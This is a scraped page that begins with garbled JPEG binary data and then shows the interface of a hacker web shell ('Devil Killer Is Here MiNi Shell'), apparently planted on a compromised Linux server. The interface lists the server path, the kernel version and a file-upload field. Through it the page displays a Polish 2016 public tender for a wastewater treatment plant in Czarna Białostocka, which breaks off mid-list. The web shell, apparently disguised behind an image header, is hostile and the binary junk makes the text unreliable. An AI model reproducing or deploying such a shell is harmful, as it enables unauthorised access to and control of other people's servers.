JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161227/374116-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.pkomunalne.pl' target='_blank'>http://www.pkomunalne.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 374116 - 2016
              z dnia 2016-12-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Czarna Białostocka: Budowa oczyszczalni ścieków wraz z rozbudową sieci kanalizacji sanitarnej oraz likwidacją istniejącej oczyszczalni ścieków w Czarnej Białostockiej 
w zakresie następujących zadań:
ZADANIE I:Budowa oczyszczalni ścieków,
ZADANIE II:Rozbudowa sieci kanalizacji sanitarnej w Czarnej Białostockiej,
ZADANIE III:Likwidacja istniejącej oczyszczalni ścieków.

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt pn. Budowa oczyszczalni ścieków wraz z rozbudową sieci kanalizacji sanitarnej oraz likwidacją istniejącej oczyszczalni ścieków w Czarnej Białostockiej współfinansowany przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2014 - 2020.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Przedsiębiorstwo Komunalne w Czarnej Białostockiej Sp. z o.o., krajowy numer identyfikacyjny
              5223407400000, ul.
              ul. Józefa Piłsudskiego 
              62,
              16-020  
              Czarna Białostocka, woj.
              podlaskie, państwo
              Polska, tel.
              857 101 719, e-mail
              biuro@pkomunalne.pl, faks
              857 101 719.
              <br />
              Adres strony internetowej (URL): www.pkomunalne.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Osoba prawna utworzona w celu zaspakajania potrzeb o charakterze powszechnym.</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.pkomunalne.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  tak
                <br />"Przedsiębiorstwo Komunalne" w Czarnej Białostockiej Sp. z o.o., ul. Piłsudskiego 62, 16-020 Czarna Białostocka.</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Składanie ofert może odbyć się osobiście, za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r  Prawo pocztowe lub za pośrednictwem posłańca (kuriera).<br />
                Adres:
                <br />"Przedsiębiorstwo Komunalne" w Czarnej Białostockiej Sp. z o.o., ul. Piłsudskiego 62, 16-020 Czarna Białostocka, pokój nr 11-sekretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa oczyszczalni ścieków wraz z rozbudową sieci kanalizacji sanitarnej oraz likwidacją istniejącej oczyszczalni ścieków w Czarnej Białostockiej 
w zakresie następujących zadań:
ZADANIE I:Budowa oczyszczalni ścieków,
ZADANIE II:Rozbudowa sieci kanalizacji sanitarnej w Czarnej Białostockiej,
ZADANIE III:Likwidacja istniejącej oczyszczalni ścieków.

<br /><b>Numer referencyjny: </b>ZP/JRP/O/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach realizacji projektu pn. Budowa oczyszczalni ścieków wraz z rozbudową sieci kanalizacji sanitarnej oraz likwidacją istniejącej oczyszczalni ścieków w Czarnej Białostockiej tj.; 

Zadanie I: Budowa oczyszczalni ścieków 
Przepustowość oczyszczalni Qdśr.= 2 x 595 m3/d = 1 190 m3/d,
Qd max=2 x 765 m3/d =1 530 m3/d.


W zakresie zadania należy wykonać:
1.Przed przystąpieniem do robót budowlanych należy wykonać sprawdzające odwierty geotechniczne w miejscach posadowienia:
a)Reaktorów 3A i 3B  w osi reaktora do 10 m,
b)	Budynku nr 2  punkt przecięcia przekątnych (na rzucie przyziemia)  do 5 m,
c)	Wiaty na osad odwodniony  punkt przecięcia przekątnych (na rzucie przyziemia)  do 5 m,
d)	Budynku administracyjno- magazynowo- warsztatowy  narożniki i punkt przecięcia przekątnych (na rzucie przyziemia)  do 5 m,
e)	Zbiornik osadu nadmiernego  w osi zbiornika do 10 m.
2.	Nowe obiekty kubaturowe:
a)	Budynek techniczny (ob. nr 2),
b)	Budynek administracyjno- magazynowo- garażowy (ob. nr 15),
c)	Stacja Fek-Pak (ob. nr 4),
d)	Wiata na osad odwodniony (ob. nr 14),
e)	Wiata na agregat prądotwórczy (ob. nr 8).
3.	Nowe obiekty technologiczne:
a)	Reaktory biologiczne 2 szt. (ob. nr 3A i 3B),
b)	Pompownia ścieków surowych (ob. nr 1),
c)	Studnia wody technologicznej (ob. nr Swt),
d)	Studnia pomiarowa ścieków oczyszczonych (ob. nr Spo),
e)	Zbiorniki uśredniające ścieków dowożonych (ob. nr 5A i 5B),
f)	Zbiornik osadu nadmiernego (ob. nr 6),
g)	Stacja PIX (ob. nr 16),
h)	Silos wapna (ob. nr 13),
i)	Studnia kraty (ob. nr Sk),
j)	Punkt zrzutu nieczystości z czyszczenia kanalizacji (ob. nr 17 i 18),
k)	Taca najazdowa punktu zlewnego ścieków dowożonych (ob. nr 4A).
4.	Elementy małej infrastruktury:
a)	Schody terenowe,
b)	Skarpy z wzmocnieniem,
c)	Rowy odwadniające.
5.	Infrastrukturę techniczną na terenie oczyszczalni ścieków:
a)	Sieć elektroenergetyczną od złącza kablowo-pomiarowego do Zestawu Tablic Zasilających i do budynku dmuchaw, przyłączy do obiektów technologicznych i sieci oświetleniowej,
b)	Sieć wodociągowa z hydrantami ppoż. i przyłącza wodociągowe do budynków,
c)	Sieć kanalizacji  sanitarnej międzyobiektowe, odprowadzenie ścieków oczyszczonych poprzez studnie pomiarową i projektowany wylot brzegowy do rowu melioracyjnego,
6.	Montaż wyposażenia technologicznego wewnątrz:
a)	Reaktorów biologicznych,
b)	Budynku technicznego,  
c)	Studni kraty, 
d)	Studni wody technologicznej, 
e)	Studni pomiarowej ścieków oczyszczonych, 
f)	Zbiorników uśredniających ścieków dowożonych, 
g)	Zbiornika osadu nadmiernego, 
h)	Budynku administracyjno-magazynowo-warsztatowego, 
i)	Punktu zrzutu nieczystości z czyszczenia kanalizacji.
7.	Prace w zakresie instalacji wod.-kan., wentylacji i ogrzewania oraz instalacji elektrycznych w budynkach i obiektach.
8.	Komunikacja na terenie oczyszczalni i dojścia do obiektów.
9.	Zieleń izolacyjna.
10.	Ogrodzenie działki oczyszczalni.
11.	Rozruch technologiczny, monitoring i wizualizację procesu oczyszczania ścieków.
12.	Instrukcję Współpracy źródła zasilania rezerwowego z siecią elektroenergetyczną i uzgodnić ją z PGE Dystrybucja S.A.
13.	Wyposażyć w sprzęt laboratoryjny i eksploatacyjny.
14.	Zamontować dwie tablice z czytelnym kolorowym schematem technologicznym  (jedna w budynku technicznym - o wym. 700 x 500mm, druga w budynku administracyjno-magazynowo-warsztatowym w formacie A0).
15.	Wykonać instrukcję eksploatacji oczyszczalni ścieków oraz instrukcję obsługi obiektów i konserwacji urządzeń niezbędnych dla prawidłowej eksploatacji oczyszczalni w języku polskim.
16.	Dostarczenie dokumentacji techniczno - ruchowej urządzeń.
17.	Kompletne oznakowanie urządzeń, stref i innych elementów instalacji całej oczyszczalni wymagających oznakowania (nazwa, parametry).

Zadanie II: Rozbudowa sieci kanalizacji sanitarnej w Czarnej Białostockiej
W zakresie zadania należy wybudować:
1.	Kanalizację sanitarną grawitacyjną na odcinku od studni S19 (studnia znajduje się na istniejącym kolektorze dopływowym do oczyszczalni ścieków przy ul. Fabrycznej) do projektowanej pompowni ścieków.
Trasa przebiega przez tereny: Gminy Czarna Białostocka, Skarbu Państwa (przejście pod drogą powiatową i pod rowem melioracyjnym), Lasów Państwowych i Polskich Kolei Państwowych (teren zamknięty).
2.	Pompownię ścieków:
a)	Komorę pompowni,
b)	Wyposażenie technologiczne (praca pomp w trybie: jedna, dwie lub trzy),
c)	Zasilanie energetyczne i oświetlenie,
d)	Zagospodarowanie terenu,
e)	Ogrodzenie.
3.	Drogę dojazdową do pompowni.
a)	Droga dojazdowa do pompowni znajduje się na terenie Gminy Czarna Białostocka, Lasów Państwowych i Polskich Kolei Państwowych (teren zamknięty).
4.	Rurociąg tłoczny z projektowanej pompowni ścieków do projektowanej studni rozprężnej znajdującej się na terenie projektowanej oczyszczalni ścieków.
a)	Trasa przebiega przez tereny: Gminy Czarna Białostocka, Polskich Kolei Państwowych (teren zamknięty i teren niezamknięty) i Inwestora.


Zadanie III: Likwidacja istniejącej oczyszczalni ścieków 
	
W zakresie zadania należy wykonać:
1)	Rozbiórkę następujących budynków:
a)	budynek dmuchaw, 
b)	budynek byłej zlewni ścieków,
c)	garaż agregatornia,
d)	sterownia wraz z  budynkiem,
e)	pompownia ścieków wraz z  budynkiem,
f)	budynek kraty. 

2)	Rozbiórkę następujących obiektów:
a)	zbiornik osadu, 
b)	zbiornik Imhoffa, 
c)	zagęszczacz osadu, 
d)	reaktor biologiczny (szt. 2), 
e)	piaskownik, 
f)	poletko osadowe, 
g)	basen ppoż.. 
3)	Pozostała rozbiórka:
a)	nawierzchnie dróg dojazdowych, placów,
b)	rozbiórką sieci wodociągowej, kanalizacyjnej, c.o.,
c)	unieczynnienie sieci elektroenergetycznej.
4)	Przebudowa wodociągu:
a)	sieć wodociągowa PE 110 L= 93,5 mb.

<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45100000-8,
                45110000-1,
                45200000-9,
                45231300-8,
                45232152-2,
                45233120-6,
                45252127-4,
                45252200-0,
                45310000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający dopuszcza udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 7 ustawy Pzp.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><div style="padding-left: 20px">
                    data zakończenia: 30/06/2018<br /></div><div style="padding-left: 20px">
                    data rozpoczęcia: 01/05/2018
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia:
ZADANIE I: do 31.12.2018r.
ZADANIE II: do 30.06.2018r. 	
ZADANIE III: od 01.05.2018r. do 31.12.2018r.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek dotyczący sytuacji ekonomicznej lub finansowej zostanie spełniony jeśli Wykonawca wykaże iż:
a)	posiada środki finansowe lub zdolność kredytową w wysokości min.:
-	dla  ZADANIA I  1 000 000,00 zł (jeden  milion złotych), 
- 	dla  ZADANIA II -   500 000,00 zł (pięćset tysięcy złotych), 
- 	dla  ZADANIA III  -  500 000,00 zł ( pięćset tysięcy złotych)

b)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną dla poszczególnych zadań:
-	dla  ZADANIA I  1 000 000,00 zł (jeden  milion złotych), 
- 	dla  ZADANIA II -   500 000,00 zł (pięćset tysięcy złotych), 
- 	dla  ZADANIA III  -  500 000,00 zł ( pięćset tysięcy złotych)
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Wykonawca musi wykazać, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał: 

Zadanie I:
co najmniej dwie roboty budowlane polegające na:  budowie, rozbudowie lub przebudowie mechaniczno - biologicznej oczyszczalni ścieków tj. realizacja kompletnych reaktorów biologicznych wraz z wyposażeniem technologicznym z zastosowaniem technologii osadu czynnego w układzie przepływowym ciągłym z pionowymi osadnikami wtórnymi, w tym jedna o przepustowości minimum Qdmax = 1000 m3/d. 

 Zadanie II: 
co najmniej jedną robotę budowlaną polegającą na rozbudowie lub budowie sieci kanalizacji sanitarnej grawitacyjnej o wartości nie mniejszej niż 500 000,00 zł netto (słownie: pięćset tysięcy złotych) wykonaną metodą bezwykopową o średnicy min. 500 mm.

Zadanie III:
co najmniej dwie roboty budowlane polegające na rozbiórce obiektu budowlanego o kubaturze nie mniejszej niż 500 m3, przy czym co najmniej jedna robota budowlana musi polegać na rozbiórce obiektów inżynieryjnych.

2.	Osoby skierowane przez Wykonawcę do realizacji zamówienia
Warunek ten zostanie spełniony jeżeli Wykonawca dysponował będzie co najmniej jedną osobą odrębnie dla każdego z ZADAŃ  będącą:
1)	ZADANIE I:
a)	Kierownikiem budowy, posiadającym co najmniej od 5 lat uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz
Posiada doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót branży sanitarnej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jednej inwestycji obejmującej: budowę lub/i przebudowę lub/i rozbudowę lub/i modernizację oczyszczalni ścieków o przepustowości co najmniej 1000 m3/d. 
b)	Kierownikiem robót budowlanych, posiadającym co najmniej od 5 lat uprawnienia do wykonywania samodzielnej funkcji w budownictwie w specjalności konstrukcyjno  budowlanej bez ograniczeń, wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót branży konstrukcyjno-budowlanej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jednej inwestycji obejmującej: budowę lub/i przebudowę lub/i rozbudowę lub/i modernizację oczyszczalni ścieków o przepustowości co najmniej 1000 m3/d.
c)	Kierownikiem robót elektrycznych, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika robót elektrycznych i AKPiA w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jedną inwestycję obejmującą budowę sieci kabli zewnętrznych, instalacji technologicznych wewnętrznych lub zewnętrznych, automatyki i układów AKPiA podczas budowy lub/i modernizacji lub/i rozbudowy lub/i przebudowy oczyszczalni ścieków.
d)	Kierownikiem robót drogowych, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika robót branży drogowej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jednej inwestycji obejmującej rozbudowę lub/i przebudowę lub/i budowę drogi o wartości nie mniejszej niż 500 000,00 zł każda.
2)	ZADANIE II:
a)	Kierownikiem budowy, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót branży sanitarnej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jednej inwestycji obejmującej rozbudowę lub budowę sieci kanalizacji sanitarnej o długości min. 1,5 km metodą bezwykopową o średnicy min.   300 mm 
oraz 
na co najmniej jednej inwestycji obejmującej rozbudowę lub/i przebudowę lub/i budowę pompowni ścieków o przepustowości co najmniej 50 l/s.
b)	Kierownikiem robót budowlanych, posiadającym co najmniej od 5 lat uprawnienia do wykonywania samodzielnej funkcji w budownictwie w specjalności konstrukcyjno  budowlanej bez ograniczeń, wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
Posiada doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót branży konstrukcyjno-budowlanej w okresie ostatnich 5 lat przed upływem terminu składania ofert na co najmniej jednej inwestycji obejmującej: budowę lub/i przebudowę lub/i rozbudowę lub/i modernizację zbiorników pompowni ścieków  o przepustowości co najmniej 50 l/s.
c)	Kierownikiem robót elektrycznych, posiadającym co najmniej od 5 lat uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub inne odpowiadające im uprawnienia wydane na podstawie obowiązujących przepisów ustawy Prawo Budowlane lub ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (kopię posiadanych uprawnień należy dostarczyć przed podpisaniem Umowy) 
oraz 
